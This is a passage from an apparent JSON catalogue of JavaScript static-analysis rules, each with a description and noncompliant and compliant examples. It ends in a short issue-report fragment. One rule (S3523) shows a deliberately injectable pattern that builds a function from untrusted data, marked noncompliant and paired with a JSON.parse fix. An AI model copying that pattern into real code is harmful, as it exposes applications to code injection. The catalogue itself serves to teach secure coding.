Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1;   \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { \/\/ Compliant\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    \/\/ ...\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    \/\/ Noncompliant;\nvar obj2 = new MyClass();    \/\/ Noncompliant if considerJSDoc parameter set to true. 
Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  \/\/ Compliant\nvar obj2 = new MyClass();  \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x  = 1;\ndelete x;       \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n  return p.gender==Person.MALE?\"Mr. 
\":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName();  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n  String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n  return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14;  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) {  \/\/ Noncompliant\n  console.log(i);\n}\n\ngo();  \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo();  \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. 
<\/p>\n<p>But just because you can, that doesn't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n  let args = Array.prototype.slice.call(arguments);  \/\/ Noncompliant\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n  var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n  if (!isTrue) {\n    for (var arg of args) {\n      ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n  if (!isTrue) {\n    for (var value of values) {\n      ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. 
<\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var a = obj1.a;  \/\/ Noncompliant\n  var b = obj1.b;\n\n  var name = obj2.name;  \/\/ ignored; there's only one extraction-and-assignment\n\n  var zero = array[0];  \/\/ Noncompliant\n  var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var {a, b} = obj1;\n\n  var {name} = obj2;  \/\/ this syntax works because var name and property name are the same\n\n  var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) {  \/\/ Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse 
JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj =  new Function(\"return \" + data)();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) =&gt; { \/* ... *\/ };  \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) =&gt; { return 0; };  \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a =&gt; { \/* ... *\/ };\nvar bar = (a, b) =&gt; 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. 
False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n  this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  constructor(initializerArgs = []) {\n    this._values = [...initializerArgs];\n  }\n\n  doSomething() {\n    \/\/...\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. 
Fortunately,\nES2015 provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n  return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) {  \/\/ Noncompliant\n  \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js');  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n  return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. 
You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly, the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>; only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (a) {\n  case 1,2:  \/\/ Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n  case 3 || 4: \/\/ Noncompliant; only '3' is handled\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");  \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (a) {\n  case 1:\n  case 2:\n    doTheThing(a);\n  case 3:\n  case 4:\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  \/\/ Noncompliant. 
undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n   ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n   ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>&gt;, &lt;, &gt;=, &lt;=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. 
Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x;  \/\/ x is currently \"undefined\"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &gt; x) {  \/\/ Noncompliant; \"x\" might still be \"undefined\"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &gt; 24) { \/\/ Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &gt; 24) {\n  doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. 
Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g. the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x &lt; 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) &lt; 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is of a primitive type (i.e., not an object), the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x;        \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x;    \/\/ true\n0 in x;           \/\/ true\n\"foobar\" in x;    \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. 
This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n  <li> <code>Array.from<\/code> <\/li>\n  <li> <code>Array.prototype.every<\/code> <\/li>\n  <li> <code>Array.prototype.filter<\/code> <\/li>\n  <li> <code>Array.prototype.find<\/code> <\/li>\n  <li> <code>Array.prototype.findIndex<\/code> <\/li>\n  <li> <code>Array.prototype.map<\/code> <\/li>\n  <li> <code>Array.prototype.reduce<\/code> <\/li>\n  <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n  <li> <code>Array.prototype.some<\/code> <\/li>\n  <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of 
extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name, most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when an empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. 
Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\");   \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n    super();         \/\/ Noncompliant, super() cannot be invoked in a base class\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    this.name = name;\n    super.doSomething();\n    super();         \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n  }\n\n  doSomething() {\n    super();         \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super();         \/\/ Noncompliant, super() must be invoked with one argument\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n  }                  \/\/ 
Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n    super(name);    \/\/ Noncompliant, super() can only be invoked once\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n\n  doSomething() {\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n  <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) {  \/\/ Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? 
getValue() : getValue();   \/\/ Noncompliant\n\nswitch (i) {  \/\/ Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2)  \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i &lt;= 10; i += 2)  \/\/ Compliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n  <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n  <li> starts above the ending value and is decremented by 1 on each iteration. 
<\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n  \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 6-5-2 <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n  by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n  'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. 
      Severity: Minor
      Found in docs/js.html by fixme

      BUG found
      Open

